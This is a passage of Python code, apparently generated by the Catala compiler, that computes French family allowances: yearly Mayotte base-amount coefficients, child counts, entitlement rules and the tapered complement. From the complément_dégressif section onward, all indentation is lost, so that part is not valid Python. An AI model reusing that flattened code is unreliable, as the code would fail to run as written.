                if log_decision_taken(SourcePosition(filename="./decrets_divers.catala_fr",
                        start_line=548, start_column=5,
                        end_line=548, end_column=69, law_headings=["Annexe",
                        "Décret n°2002-423 du 29 mars 2002 relatif aux prestations familiales à Mayotte",
                        "Dispositions spéciales relatives à Mayotte",
                        "Décrets divers"]), ((date_courante_105 >=
                        date_of_numbers(2016, 1, 1)) and (date_courante_105 <=
                        date_of_numbers(2016, 12, 31)))):
                    if (list_length(enfants_a_charge_droit_ouvert_prestation_familiale_231) >
                            integer_of_string("1")):
                        return (prestations_familiales_dot_base_mensuelle_222 *
                            decimal_of_string("0.273"))
                    else:
                        return money_of_cents_string("0")
                else:
                    raise EmptyError
            except EmptyError:
                raise EmptyError
        # 2017: 26.72 %.
        def local_var_307(_: Any):
            try:
                if log_decision_taken(SourcePosition(filename="./decrets_divers.catala_fr",
                        start_line=555, start_column=5,
                        end_line=555, end_column=69, law_headings=["Annexe",
                        "Décret n°2002-423 du 29 mars 2002 relatif aux prestations familiales à Mayotte",
                        "Dispositions spéciales relatives à Mayotte",
                        "Décrets divers"]), ((date_courante_105 >=
                        date_of_numbers(2017, 1, 1)) and (date_courante_105 <=
                        date_of_numbers(2017, 12, 31)))):
                    if (list_length(enfants_a_charge_droit_ouvert_prestation_familiale_231) >
                            integer_of_string("1")):
                        return (prestations_familiales_dot_base_mensuelle_222 *
                            decimal_of_string("0.2672"))
                    else:
                        return money_of_cents_string("0")
                else:
                    raise EmptyError
            except EmptyError:
                raise EmptyError
        # 2018: 28.4 %.
        def local_var_305(_: Any):
            try:
                if log_decision_taken(SourcePosition(filename="./decrets_divers.catala_fr",
                        start_line=562, start_column=5,
                        end_line=562, end_column=69, law_headings=["Annexe",
                        "Décret n°2002-423 du 29 mars 2002 relatif aux prestations familiales à Mayotte",
                        "Dispositions spéciales relatives à Mayotte",
                        "Décrets divers"]), ((date_courante_105 >=
                        date_of_numbers(2018, 1, 1)) and (date_courante_105 <=
                        date_of_numbers(2018, 12, 31)))):
                    if (list_length(enfants_a_charge_droit_ouvert_prestation_familiale_231) >
                            integer_of_string("1")):
                        return (prestations_familiales_dot_base_mensuelle_222 *
                            decimal_of_string("0.284"))
                    else:
                        return money_of_cents_string("0")
                else:
                    raise EmptyError
            except EmptyError:
                raise EmptyError
        # 2019: 29.36 %.
        def local_var_303(_: Any):
            try:
                if log_decision_taken(SourcePosition(filename="./decrets_divers.catala_fr",
                        start_line=569, start_column=5,
                        end_line=569, end_column=69, law_headings=["Annexe",
                        "Décret n°2002-423 du 29 mars 2002 relatif aux prestations familiales à Mayotte",
                        "Dispositions spéciales relatives à Mayotte",
                        "Décrets divers"]), ((date_courante_105 >=
                        date_of_numbers(2019, 1, 1)) and (date_courante_105 <=
                        date_of_numbers(2019, 12, 31)))):
                    if (list_length(enfants_a_charge_droit_ouvert_prestation_familiale_231) >
                            integer_of_string("1")):
                        return (prestations_familiales_dot_base_mensuelle_222 *
                            decimal_of_string("0.2936"))
                    else:
                        return money_of_cents_string("0")
                else:
                    raise EmptyError
            except EmptyError:
                raise EmptyError
        # 2020: 30.68 %.
        def local_var_301(_: Any):
            try:
                if log_decision_taken(SourcePosition(filename="./decrets_divers.catala_fr",
                        start_line=576, start_column=5,
                        end_line=576, end_column=69, law_headings=["Annexe",
                        "Décret n°2002-423 du 29 mars 2002 relatif aux prestations familiales à Mayotte",
                        "Dispositions spéciales relatives à Mayotte",
                        "Décrets divers"]), ((date_courante_105 >=
                        date_of_numbers(2020, 1, 1)) and (date_courante_105 <=
                        date_of_numbers(2020, 12, 31)))):
                    if (list_length(enfants_a_charge_droit_ouvert_prestation_familiale_231) >
                            integer_of_string("1")):
                        return (prestations_familiales_dot_base_mensuelle_222 *
                            decimal_of_string("0.3068"))
                    else:
                        return money_of_cents_string("0")
                else:
                    raise EmptyError
            except EmptyError:
                raise EmptyError
        # Resolve the default tree: exceptions 2020 … 2011, then fallback.
        local_var_300 = handle_default([local_var_301, local_var_303,
            local_var_305, local_var_307,
            local_var_309, local_var_311,
            local_var_313, local_var_315,
            local_var_317, local_var_319],
            local_var_321, local_var_323)
    except EmptyError:
        raise EmptyError
except EmptyError:
    # No rule produced a value for this variable.
    raise NoValueProvided(SourcePosition(filename="./prologue.catala_fr",
        start_line=122, start_column=11,
        end_line=122, end_column=55,
        law_headings=["Prologue"]))
montant_initial_base_deuxieme_enfant_mayotte_299 = log_variable_definition(["AllocationsFamiliales",
    "montant_initial_base_deuxième_enfant_mayotte"], local_var_300)
# NOTE(review): Catala-compiler-generated code — edit the .catala_fr sources,
# not this file.  Defines "montant_initial_base_premier_enfant_mayotte":
# initial base amount for the first child in Mayotte.  The yearly rules here
# additionally require that the household did NOT have a child in charge
# before 1 January 2012 (`avait_enfant_a_charge_avant_1er_janvier_2012_107`);
# households that did fall under local_var_327's flat amount instead.
try:
    try:
        # Fallback rule: 5.88 % of the monthly family-benefit base when at
        # least one child opens entitlement, else 0.
        def local_var_351(_: Any):
            try:
                if (list_length(enfants_a_charge_droit_ouvert_prestation_familiale_231) >
                        integer_of_string("0")):
                    return (prestations_familiales_dot_base_mensuelle_222 *
                        decimal_of_string("0.0588"))
                else:
                    return money_of_cents_string("0")
            except EmptyError:
                raise EmptyError
        # Justification of the fallback: always applicable (True).
        def local_var_349(_: Any):
            return log_decision_taken(SourcePosition(filename="./prologue.catala_fr",
                start_line=121, start_column=11,
                end_line=121, end_column=54,
                law_headings=["Prologue"]), True)
        # Year-specific coefficients, only for households without a child in
        # charge before 2012-01-01.  2011: 14.5 % of the monthly base.
        def local_var_347(_: Any):
            try:
                if log_decision_taken(SourcePosition(filename="./decrets_divers.catala_fr",
                        start_line=425, start_column=5,
                        end_line=426, end_column=53, law_headings=["Annexe",
                        "Décret n°2002-423 du 29 mars 2002 relatif aux prestations familiales à Mayotte",
                        "Dispositions spéciales relatives à Mayotte",
                        "Décrets divers"]), ((date_courante_105 >=
                        date_of_numbers(2011, 1, 1)) and ((date_courante_105 <=
                        date_of_numbers(2011, 12, 31)) and
                        not avait_enfant_a_charge_avant_1er_janvier_2012_107))):
                    if (list_length(enfants_a_charge_droit_ouvert_prestation_familiale_231) >
                            integer_of_string("0")):
                        return (prestations_familiales_dot_base_mensuelle_222 *
                            decimal_of_string("0.145"))
                    else:
                        return money_of_cents_string("0")
                else:
                    raise EmptyError
            except EmptyError:
                raise EmptyError
        # 2012: 13.93 %.
        def local_var_345(_: Any):
            try:
                if log_decision_taken(SourcePosition(filename="./decrets_divers.catala_fr",
                        start_line=433, start_column=5,
                        end_line=434, end_column=53, law_headings=["Annexe",
                        "Décret n°2002-423 du 29 mars 2002 relatif aux prestations familiales à Mayotte",
                        "Dispositions spéciales relatives à Mayotte",
                        "Décrets divers"]), ((date_courante_105 >=
                        date_of_numbers(2012, 1, 1)) and ((date_courante_105 <=
                        date_of_numbers(2012, 12, 31)) and
                        not avait_enfant_a_charge_avant_1er_janvier_2012_107))):
                    if (list_length(enfants_a_charge_droit_ouvert_prestation_familiale_231) >
                            integer_of_string("0")):
                        return (prestations_familiales_dot_base_mensuelle_222 *
                            decimal_of_string("0.1393"))
                    else:
                        return money_of_cents_string("0")
                else:
                    raise EmptyError
            except EmptyError:
                raise EmptyError
        # 2013: 13.35 %.
        def local_var_343(_: Any):
            try:
                if log_decision_taken(SourcePosition(filename="./decrets_divers.catala_fr",
                        start_line=441, start_column=5,
                        end_line=442, end_column=53, law_headings=["Annexe",
                        "Décret n°2002-423 du 29 mars 2002 relatif aux prestations familiales à Mayotte",
                        "Dispositions spéciales relatives à Mayotte",
                        "Décrets divers"]), ((date_courante_105 >=
                        date_of_numbers(2013, 1, 1)) and ((date_courante_105 <=
                        date_of_numbers(2013, 12, 31)) and
                        not avait_enfant_a_charge_avant_1er_janvier_2012_107))):
                    if (list_length(enfants_a_charge_droit_ouvert_prestation_familiale_231) >
                            integer_of_string("0")):
                        return (prestations_familiales_dot_base_mensuelle_222 *
                            decimal_of_string("0.1335"))
                    else:
                        return money_of_cents_string("0")
                else:
                    raise EmptyError
            except EmptyError:
                raise EmptyError
        # 2014: 12.78 %.
        def local_var_341(_: Any):
            try:
                if log_decision_taken(SourcePosition(filename="./decrets_divers.catala_fr",
                        start_line=449, start_column=5,
                        end_line=450, end_column=53, law_headings=["Annexe",
                        "Décret n°2002-423 du 29 mars 2002 relatif aux prestations familiales à Mayotte",
                        "Dispositions spéciales relatives à Mayotte",
                        "Décrets divers"]), ((date_courante_105 >=
                        date_of_numbers(2014, 1, 1)) and ((date_courante_105 <=
                        date_of_numbers(2014, 12, 31)) and
                        not avait_enfant_a_charge_avant_1er_janvier_2012_107))):
                    if (list_length(enfants_a_charge_droit_ouvert_prestation_familiale_231) >
                            integer_of_string("0")):
                        return (prestations_familiales_dot_base_mensuelle_222 *
                            decimal_of_string("0.1278"))
                    else:
                        return money_of_cents_string("0")
                else:
                    raise EmptyError
            except EmptyError:
                raise EmptyError
        # 2015: 12.2 %.
        def local_var_339(_: Any):
            try:
                if log_decision_taken(SourcePosition(filename="./decrets_divers.catala_fr",
                        start_line=457, start_column=5,
                        end_line=458, end_column=53, law_headings=["Annexe",
                        "Décret n°2002-423 du 29 mars 2002 relatif aux prestations familiales à Mayotte",
                        "Dispositions spéciales relatives à Mayotte",
                        "Décrets divers"]), ((date_courante_105 >=
                        date_of_numbers(2015, 1, 1)) and ((date_courante_105 <=
                        date_of_numbers(2015, 12, 31)) and
                        not avait_enfant_a_charge_avant_1er_janvier_2012_107))):
                    if (list_length(enfants_a_charge_droit_ouvert_prestation_familiale_231) >
                            integer_of_string("0")):
                        return (prestations_familiales_dot_base_mensuelle_222 *
                            decimal_of_string("0.122"))
                    else:
                        return money_of_cents_string("0")
                else:
                    raise EmptyError
            except EmptyError:
                raise EmptyError
        # 2016: 11.63 %.
        def local_var_337(_: Any):
            try:
                if log_decision_taken(SourcePosition(filename="./decrets_divers.catala_fr",
                        start_line=465, start_column=5,
                        end_line=466, end_column=53, law_headings=["Annexe",
                        "Décret n°2002-423 du 29 mars 2002 relatif aux prestations familiales à Mayotte",
                        "Dispositions spéciales relatives à Mayotte",
                        "Décrets divers"]), ((date_courante_105 >=
                        date_of_numbers(2016, 1, 1)) and ((date_courante_105 <=
                        date_of_numbers(2016, 12, 31)) and
                        not avait_enfant_a_charge_avant_1er_janvier_2012_107))):
                    if (list_length(enfants_a_charge_droit_ouvert_prestation_familiale_231) >
                            integer_of_string("0")):
                        return (prestations_familiales_dot_base_mensuelle_222 *
                            decimal_of_string("0.1163"))
                    else:
                        return money_of_cents_string("0")
                else:
                    raise EmptyError
            except EmptyError:
                raise EmptyError
        # 2017: 11.5 %.
        def local_var_335(_: Any):
            try:
                if log_decision_taken(SourcePosition(filename="./decrets_divers.catala_fr",
                        start_line=473, start_column=5,
                        end_line=474, end_column=53, law_headings=["Annexe",
                        "Décret n°2002-423 du 29 mars 2002 relatif aux prestations familiales à Mayotte",
                        "Dispositions spéciales relatives à Mayotte",
                        "Décrets divers"]), ((date_courante_105 >=
                        date_of_numbers(2017, 1, 1)) and ((date_courante_105 <=
                        date_of_numbers(2017, 12, 31)) and
                        not avait_enfant_a_charge_avant_1er_janvier_2012_107))):
                    if (list_length(enfants_a_charge_droit_ouvert_prestation_familiale_231) >
                            integer_of_string("0")):
                        return (prestations_familiales_dot_base_mensuelle_222 *
                            decimal_of_string("0.115"))
                    else:
                        return money_of_cents_string("0")
                else:
                    raise EmptyError
            except EmptyError:
                raise EmptyError
        # 2018: 9.76 %.
        def local_var_333(_: Any):
            try:
                if log_decision_taken(SourcePosition(filename="./decrets_divers.catala_fr",
                        start_line=481, start_column=5,
                        end_line=482, end_column=53, law_headings=["Annexe",
                        "Décret n°2002-423 du 29 mars 2002 relatif aux prestations familiales à Mayotte",
                        "Dispositions spéciales relatives à Mayotte",
                        "Décrets divers"]), ((date_courante_105 >=
                        date_of_numbers(2018, 1, 1)) and ((date_courante_105 <=
                        date_of_numbers(2018, 12, 31)) and
                        not avait_enfant_a_charge_avant_1er_janvier_2012_107))):
                    if (list_length(enfants_a_charge_droit_ouvert_prestation_familiale_231) >
                            integer_of_string("0")):
                        return (prestations_familiales_dot_base_mensuelle_222 *
                            decimal_of_string("0.0976"))
                    else:
                        return money_of_cents_string("0")
                else:
                    raise EmptyError
            except EmptyError:
                raise EmptyError
        # 2019: 8.47 %.
        def local_var_331(_: Any):
            try:
                if log_decision_taken(SourcePosition(filename="./decrets_divers.catala_fr",
                        start_line=489, start_column=5,
                        end_line=490, end_column=53, law_headings=["Annexe",
                        "Décret n°2002-423 du 29 mars 2002 relatif aux prestations familiales à Mayotte",
                        "Dispositions spéciales relatives à Mayotte",
                        "Décrets divers"]), ((date_courante_105 >=
                        date_of_numbers(2019, 1, 1)) and ((date_courante_105 <=
                        date_of_numbers(2019, 12, 31)) and
                        not avait_enfant_a_charge_avant_1er_janvier_2012_107))):
                    if (list_length(enfants_a_charge_droit_ouvert_prestation_familiale_231) >
                            integer_of_string("0")):
                        return (prestations_familiales_dot_base_mensuelle_222 *
                            decimal_of_string("0.0847"))
                    else:
                        return money_of_cents_string("0")
                else:
                    raise EmptyError
            except EmptyError:
                raise EmptyError
        # 2020: 7.17 %.
        def local_var_329(_: Any):
            try:
                if log_decision_taken(SourcePosition(filename="./decrets_divers.catala_fr",
                        start_line=497, start_column=5,
                        end_line=498, end_column=53, law_headings=["Annexe",
                        "Décret n°2002-423 du 29 mars 2002 relatif aux prestations familiales à Mayotte",
                        "Dispositions spéciales relatives à Mayotte",
                        "Décrets divers"]), ((date_courante_105 >=
                        date_of_numbers(2020, 1, 1)) and ((date_courante_105 <=
                        date_of_numbers(2020, 12, 31)) and
                        not avait_enfant_a_charge_avant_1er_janvier_2012_107))):
                    if (list_length(enfants_a_charge_droit_ouvert_prestation_familiale_231) >
                            integer_of_string("0")):
                        return (prestations_familiales_dot_base_mensuelle_222 *
                            decimal_of_string("0.0717"))
                    else:
                        return money_of_cents_string("0")
                else:
                    raise EmptyError
            except EmptyError:
                raise EmptyError
        # Households with a child in charge before 2012-01-01: flat amount of
        # 5728 cents when at least one child opens entitlement, else 0.
        def local_var_327(_: Any):
            try:
                if log_decision_taken(SourcePosition(filename="./decrets_divers.catala_fr",
                        start_line=505, start_column=5,
                        end_line=505, end_column=49, law_headings=["Annexe",
                        "Décret n°2002-423 du 29 mars 2002 relatif aux prestations familiales à Mayotte",
                        "Dispositions spéciales relatives à Mayotte",
                        "Décrets divers"]), avait_enfant_a_charge_avant_1er_janvier_2012_107):
                    if (list_length(enfants_a_charge_droit_ouvert_prestation_familiale_231) >
                            integer_of_string("0")):
                        return money_of_cents_string("5728")
                    else:
                        return money_of_cents_string("0")
                else:
                    raise EmptyError
            except EmptyError:
                raise EmptyError
        # Resolve the default tree: the flat-amount rule plus yearly rules,
        # then the fallback.
        local_var_326 = handle_default([local_var_327, local_var_329,
            local_var_331, local_var_333,
            local_var_335, local_var_337,
            local_var_339, local_var_341,
            local_var_343, local_var_345,
            local_var_347], local_var_349,
            local_var_351)
    except EmptyError:
        raise EmptyError
except EmptyError:
    # No rule produced a value for this variable.
    raise NoValueProvided(SourcePosition(filename="./prologue.catala_fr",
        start_line=121, start_column=11,
        end_line=121, end_column=54,
        law_headings=["Prologue"]))
montant_initial_base_premier_enfant_mayotte_325 = log_variable_definition(["AllocationsFamiliales",
    "montant_initial_base_premier_enfant_mayotte"], local_var_326)
# Defines "nombre_total_enfants": the total number of children opening
# entitlement to family benefits, converted from integer to decimal.  The
# nested try/except layers mirror the Catala default-logic evaluation; they
# are generated and all collapse to re-raising EmptyError here.
try:
    try:
        try:
            local_var_354 = decimal_of_integer(list_length(
                enfants_a_charge_droit_ouvert_prestation_familiale_231))
        except EmptyError:
            raise EmptyError
    except EmptyError:
        raise EmptyError
except EmptyError:
    # No rule produced a value for this variable.
    raise NoValueProvided(SourcePosition(filename="./prologue.catala_fr",
        start_line=115, start_column=11,
        end_line=115, end_column=31,
        law_headings=["Prologue"]))
nombre_total_enfants_353 = log_variable_definition(["AllocationsFamiliales",
    "nombre_total_enfants"], local_var_354)
# Defines "nombre_moyen_enfants": the weighted child count.  Folds over the
# eligible children, weighting each by its "prise en compte" status:
# Complete -> 1, Partagée (shared custody) -> 0.5, Zero -> 0.
try:
    try:
        try:
            # Fold step: add the weight of one child to the accumulator.
            def local_var_357(acc_358: Decimal, enfant_359: Any):
                # Call the prise_en_compte scope function, with begin/end
                # call logging around it (generated tracing).
                match_arg_556 = log_end_call(["AllocationsFamiliales",
                    "prise_en_compte"],
                    log_variable_definition(["AllocationsFamiliales",
                    "prise_en_compte", "output"],
                    log_begin_call(["AllocationsFamiliales",
                    "prise_en_compte"], prise_en_compte_108,
                    log_variable_definition(["AllocationsFamiliales",
                    "prise_en_compte", "input"],
                    enfant_359))))
                if match_arg_556.code == PriseEnCompte_Code.Complete:
                    _ = match_arg_556.value
                    local_var_360 = decimal_of_string("1.")
                elif match_arg_556.code == PriseEnCompte_Code.Partagee:
                    _ = match_arg_556.value
                    local_var_360 = decimal_of_string("0.5")
                elif match_arg_556.code == PriseEnCompte_Code.Zero:
                    _ = match_arg_556.value
                    local_var_360 = decimal_of_string("0.")
                return (acc_358 + local_var_360)
            local_var_356 = list_fold_left(local_var_357,
                decimal_of_string("0."),
                enfants_a_charge_droit_ouvert_prestation_familiale_231)
        except EmptyError:
            raise EmptyError
    except EmptyError:
        raise EmptyError
except EmptyError:
    # No rule produced a value for this variable.
    raise NoValueProvided(SourcePosition(filename="./prologue.catala_fr",
        start_line=114, start_column=11,
        end_line=114, end_column=31,
        law_headings=["Prologue"]))
nombre_moyen_enfants_355 = log_variable_definition(["AllocationsFamiliales",
    "nombre_moyen_enfants"], local_var_356)
# Defines "montant_initial_base_premier_enfant" (article D755-5): in the
# overseas-department regime (régime L751-1) with exactly one eligible child,
# the amount is 5.88 % of the monthly family-benefit base; in every other
# case the rule is empty and the middle except supplies 0.
try:
    try:
        try:
            try:
                if log_decision_taken(SourcePosition(filename="./securite_sociale_D.catala_fr",
                        start_line=359, start_column=5,
                        end_line=360, end_column=71,
                        law_headings=["Article D755-5",
                        "Chapitre 5 : Prestations familiales et prestations assimilées",
                        "Titre 5 : Départements d'outre-mer",
                        "Livre 7 : Régimes divers - Dispositions diverses",
                        "Partie réglementaire - Décrets simples",
                        "Code de la sécurité sociale"]), (prestations_familiales_dot_regime_outre_mer_l751_1_221 and
                        (list_length(enfants_a_charge_droit_ouvert_prestation_familiale_231) ==
                        integer_of_string("1")))):
                    local_var_365 = (prestations_familiales_dot_base_mensuelle_222 *
                        decimal_of_string("0.0588"))
                else:
                    raise EmptyError
            except EmptyError:
                raise EmptyError
        except EmptyError:
            # Default when the D755-5 condition does not apply: 0.
            local_var_365 = money_of_cents_string("0")
    except EmptyError:
        raise EmptyError
except EmptyError:
    # No rule produced a value for this variable.
    raise NoValueProvided(SourcePosition(filename="./prologue.catala_fr",
        start_line=110, start_column=11,
        end_line=110, end_column=46,
        law_headings=["Prologue"]))
montant_initial_base_premier_enfant_364 = log_variable_definition(["AllocationsFamiliales",
    "montant_initial_base_premier_enfant"], local_var_365)
# Defines "droit_ouvert_base": whether the base family-allowance entitlement
# is open.  Rules (resolved by handle_default, outer except -> False):
#   - general rule (art. L521-1): at least 2 eligible children;
#   - exception (art. L755-12): overseas-department regime and >= 1 child;
#   - exception (décret n°2002-423 art. 7): residence in Mayotte and
#     >= 1 child.
try:
    try:
        # Fallback consequence (art. L521-1): entitlement with >= 2 children.
        def local_var_374(_: Any):
            try:
                if log_decision_taken(SourcePosition(filename="./securite_sociale_L.catala_fr",
                        start_line=101, start_column=5,
                        end_line=101, end_column=70,
                        law_headings=["Article L521-1",
                        "Chapitre 1er : Allocations familiales",
                        "Titre 2 : Prestations générales d'entretien",
                        "Livre 5 : Prestations familiales et prestations assimilées",
                        "Partie législative",
                        "Code de la sécurité sociale"]), (list_length(enfants_a_charge_droit_ouvert_prestation_familiale_231) >=
                        integer_of_string("2"))):
                    return True
                else:
                    raise EmptyError
            except EmptyError:
                raise EmptyError
        # Justification of the fallback: always applicable (True).
        def local_var_372(_: Any):
            return log_decision_taken(SourcePosition(filename="./prologue.catala_fr",
                start_line=108, start_column=11,
                end_line=108, end_column=28,
                law_headings=["Prologue"]), True)
        # Exception (art. L755-12): overseas departments, >= 1 child.
        def local_var_370(_: Any):
            try:
                if log_decision_taken(SourcePosition(filename="./securite_sociale_L.catala_fr",
                        start_line=406, start_column=5,
                        end_line=407, end_column=72,
                        law_headings=["Article L755-12",
                        "Chapitre 5 : Prestations familiales et prestations assimilées",
                        "Titre 5 : Dispositions particulières à la Guadeloupe, à la Guyane, à la Martinique, à La Réunion, à Saint-Barthélemy et à Saint-Martin",
                        "Livre 7 : Régimes divers - Dispositions diverses",
                        "Partie législative",
                        "Code de la sécurité sociale"]), (prestations_familiales_dot_regime_outre_mer_l751_1_221 and
                        (list_length(enfants_a_charge_droit_ouvert_prestation_familiale_231) >=
                        integer_of_string("1")))):
                    return True
                else:
                    raise EmptyError
            except EmptyError:
                raise EmptyError
        # Exception (décret n°2002-423 art. 7): Mayotte residence, >= 1 child.
        def local_var_368(_: Any):
            try:
                if log_decision_taken(SourcePosition(filename="./decrets_divers.catala_fr",
                        start_line=344, start_column=5,
                        end_line=345, end_column=72,
                        law_headings=["Article 7",
                        "Décret n°2002-423 du 29 mars 2002 relatif aux prestations familiales à Mayotte",
                        "Dispositions spéciales relatives à Mayotte",
                        "Décrets divers"]), ((residence_104 ==
                        Collectivite(Collectivite_Code.Mayotte, Unit())) and
                        (list_length(enfants_a_charge_droit_ouvert_prestation_familiale_231) >=
                        integer_of_string("1")))):
                    return True
                else:
                    raise EmptyError
            except EmptyError:
                raise EmptyError
        local_var_367 = handle_default([local_var_368, local_var_370],
            local_var_372, local_var_374)
    except EmptyError:
        # When no rule applies at all, entitlement is not open.
        local_var_367 = False
except EmptyError:
    # No rule produced a value for this variable.
    raise NoValueProvided(SourcePosition(filename="./prologue.catala_fr",
        start_line=108, start_column=11,
        end_line=108, end_column=28,
        law_headings=["Prologue"]))
droit_ouvert_base_366 = log_variable_definition(["AllocationsFamiliales",
    "droit_ouvert_base"], local_var_367)
# Defines "droit_ouvert_majoration": a function from a child to whether the
# age-based allowance increase is open (article L521-3).  Two rules, tried in
# order via nested EmptyError handling, with False as the final default:
#   1. the household has at least nombre_enfants_alinea_2_l521_3 children and
#      the child has reached the minimum age of alinéa 1;
#   2. otherwise, the child is NOT the eldest and has reached that minimum
#      age.
try:
    def local_var_377(param_378: Enfant):
        try:
            try:
                try:
                    try:
                        # Rule 1 (L521-3, second paragraph condition).
                        if log_decision_taken(SourcePosition(filename="./securite_sociale_L.catala_fr",
                                start_line=313, start_column=5,
                                end_line=315, end_column=58,
                                law_headings=["Article L521-3",
                                "Chapitre 1er : Allocations familiales",
                                "Titre 2 : Prestations générales d'entretien",
                                "Livre 5 : Prestations familiales et prestations assimilées",
                                "Partie législative",
                                "Code de la sécurité sociale"]), ((list_length(enfants_a_charge_droit_ouvert_prestation_familiale_231) >=
                                nombre_enfants_alinea_2_l521_3_204) and
                                (param_378.age >=
                                log_end_call(["AllocationsFamiliales",
                                "âge_minimum_alinéa_1_l521_3"],
                                log_variable_definition(["AllocationsFamiliales",
                                "âge_minimum_alinéa_1_l521_3", "output"],
                                log_begin_call(["AllocationsFamiliales",
                                "âge_minimum_alinéa_1_l521_3"],
                                age_minimum_alinea_1_l521_3_228,
                                log_variable_definition(["AllocationsFamiliales",
                                "âge_minimum_alinéa_1_l521_3", "input"],
                                param_378))))))):
                            return True
                        else:
                            raise EmptyError
                    except EmptyError:
                        raise EmptyError
                except EmptyError:
                    # Rule 2: not the eldest child, and above the minimum age.
                    try:
                        if log_decision_taken(SourcePosition(filename="./securite_sociale_L.catala_fr",
                                start_line=299, start_column=5,
                                end_line=300, end_column=58,
                                law_headings=["Article L521-3",
                                "Chapitre 1er : Allocations familiales",
                                "Titre 2 : Prestations générales d'entretien",
                                "Livre 5 : Prestations familiales et prestations assimilées",
                                "Partie législative",
                                "Code de la sécurité sociale"]), (not log_end_call(["AllocationsFamiliales",
                                "est_enfant_le_plus_âgé"],
                                log_variable_definition(["AllocationsFamiliales",
                                "est_enfant_le_plus_âgé", "output"],
                                log_begin_call(["AllocationsFamiliales",
                                "est_enfant_le_plus_âgé"],
                                est_enfant_le_plus_age_235,
                                log_variable_definition(["AllocationsFamiliales",
                                "est_enfant_le_plus_âgé", "input"],
                                param_378)))) and (param_378.age >=
                                log_end_call(["AllocationsFamiliales",
                                "âge_minimum_alinéa_1_l521_3"],
                                log_variable_definition(["AllocationsFamiliales",
                                "âge_minimum_alinéa_1_l521_3", "output"],
                                log_begin_call(["AllocationsFamiliales",
                                "âge_minimum_alinéa_1_l521_3"],
                                age_minimum_alinea_1_l521_3_228,
                                log_variable_definition(["AllocationsFamiliales",
                                "âge_minimum_alinéa_1_l521_3", "input"],
                                param_378))))))):
                            return True
                        else:
                            raise EmptyError
                    except EmptyError:
                        raise EmptyError
            except EmptyError:
                # Neither rule applies: no increase for this child.
                return False
        except EmptyError:
            raise NoValueProvided(SourcePosition(filename="./prologue.catala_fr",
                start_line=132,
                start_column=11,
                end_line=132,
                end_column=34,
                law_headings=["Prologue"]))
except EmptyError:
    # No rule produced a value for this variable.
    raise NoValueProvided(SourcePosition(filename="./prologue.catala_fr",
        start_line=132, start_column=11,
        end_line=132, end_column=34,
        law_headings=["Prologue"]))
droit_ouvert_majoration_376 = log_variable_definition(["AllocationsFamiliales",
    "droit_ouvert_majoration"], local_var_377)
# Scope variable "complément_dégressif" (Art. D521-1): when household
# resources exceed a ceiling by less than 12x the monthly amount
# param_381, the allowance is tapered linearly ((ceiling + 12*amount -
# resources) / 12) instead of dropping to zero.  Catala-generated
# default logic: each local_var_* def is one statutory branch; a branch
# signals "not applicable" by raising EmptyError, and handle_default
# picks the single applicable one (base case: 0).
try:
def local_var_380(param_381: Money):
try:
try:
# Base case when no taper branch applies: zero complement.
def local_var_388(_: Any):
return money_of_cents_string("0")
# Always-true justification recorded for the default branch.
def local_var_386(_: Any):
return log_decision_taken(SourcePosition(filename="./prologue.catala_fr",
start_line=141, start_column=11,
end_line=141, end_column=31,
law_headings=["Prologue"]), True)
# Branch: resources just above the first ceiling (plafond I, D521-3).
def local_var_384(_: Any):
try:
if log_decision_taken(SourcePosition(filename="./securite_sociale_D.catala_fr",
start_line=162, start_column=5,
end_line=163, end_column=68,
law_headings=["Article D521-1",
"Chapitre 1er : Allocations familiales",
"Titre 2 : Prestations générales d'entretien",
"Livre 5 : Prestations familiales et prestations assimilées",
"Partie réglementaire - Décrets simples",
"Code de la sécurité sociale"]), ((ressources_menage_103 >
plafond__i_d521_3_252) and
(ressources_menage_103 <=
(plafond__i_d521_3_252 + (param_381 *
decimal_of_string("12.")))))):
return ((plafond__i_d521_3_252 +
((param_381 * decimal_of_string("12.")) -
ressources_menage_103)) *
(decimal_of_string("1.") /
decimal_of_string("12.")))
else:
raise EmptyError
except EmptyError:
raise EmptyError
# Branch: resources just above the second ceiling (plafond II, D521-3).
def local_var_382(_: Any):
try:
if log_decision_taken(SourcePosition(filename="./securite_sociale_D.catala_fr",
start_line=170, start_column=5,
end_line=171, end_column=68,
law_headings=["Article D521-1",
"Chapitre 1er : Allocations familiales",
"Titre 2 : Prestations générales d'entretien",
"Livre 5 : Prestations familiales et prestations assimilées",
"Partie réglementaire - Décrets simples",
"Code de la sécurité sociale"]), ((ressources_menage_103 >
plafond__i_i_d521_3_238) and
(ressources_menage_103 <=
(plafond__i_i_d521_3_238 + (param_381 *
decimal_of_string("12.")))))):
return ((plafond__i_i_d521_3_238 +
((param_381 * decimal_of_string("12.")) -
ressources_menage_103)) *
(decimal_of_string("1.") /
decimal_of_string("12.")))
else:
raise EmptyError
except EmptyError:
raise EmptyError
return handle_default([local_var_382, local_var_384],
local_var_386, local_var_388)
except EmptyError:
raise EmptyError
except EmptyError:
# No branch applied at all: surface a positioned error to the caller.
raise NoValueProvided(SourcePosition(filename="./prologue.catala_fr",
start_line=141,
start_column=11,
end_line=141,
end_column=31,
law_headings=["Prologue"]))
except EmptyError:
raise NoValueProvided(SourcePosition(filename="./prologue.catala_fr",
start_line=141, start_column=11,
end_line=141, end_column=31,
law_headings=["Prologue"]))
complement_degressif_379 = log_variable_definition(["AllocationsFamiliales",
"complément_dégressif"], local_var_380)
# Scope variable "montant_versé_forfaitaire_par_enfant" (Art. D521-2):
# per-child lump-sum amount as a fraction of the monthly family-benefit
# base (BMAF), chosen by which resource ceiling bracket the household
# falls in.  Default-logic branches resolved by handle_default; the
# ultimate fallback (local_var_400) raises EmptyError, i.e. there is no
# base case — one bracket branch must always apply.
try:
def local_var_400(_: Any):
raise EmptyError
def local_var_398(_: Any):
return log_decision_taken(SourcePosition(filename="./prologue.catala_fr",
start_line=128, start_column=11, end_line=128, end_column=47,
law_headings=["Prologue"]), True)
# Branch: resources at or below plafond I -> 20.234% of the base.
def local_var_396(_: Any):
try:
if log_decision_taken(SourcePosition(filename="./securite_sociale_D.catala_fr",
start_line=215, start_column=5,
end_line=215, end_column=43,
law_headings=["Article D521-2",
"Chapitre 1er : Allocations familiales",
"Titre 2 : Prestations générales d'entretien",
"Livre 5 : Prestations familiales et prestations assimilées",
"Partie réglementaire - Décrets simples",
"Code de la sécurité sociale"]), (ressources_menage_103 <=
plafond__i_d521_3_252)):
return (prestations_familiales_dot_base_mensuelle_222 *
decimal_of_string("0.20234"))
else:
raise EmptyError
except EmptyError:
raise EmptyError
# Branch: resources between plafond I and plafond II -> 11.17%.
def local_var_394(_: Any):
try:
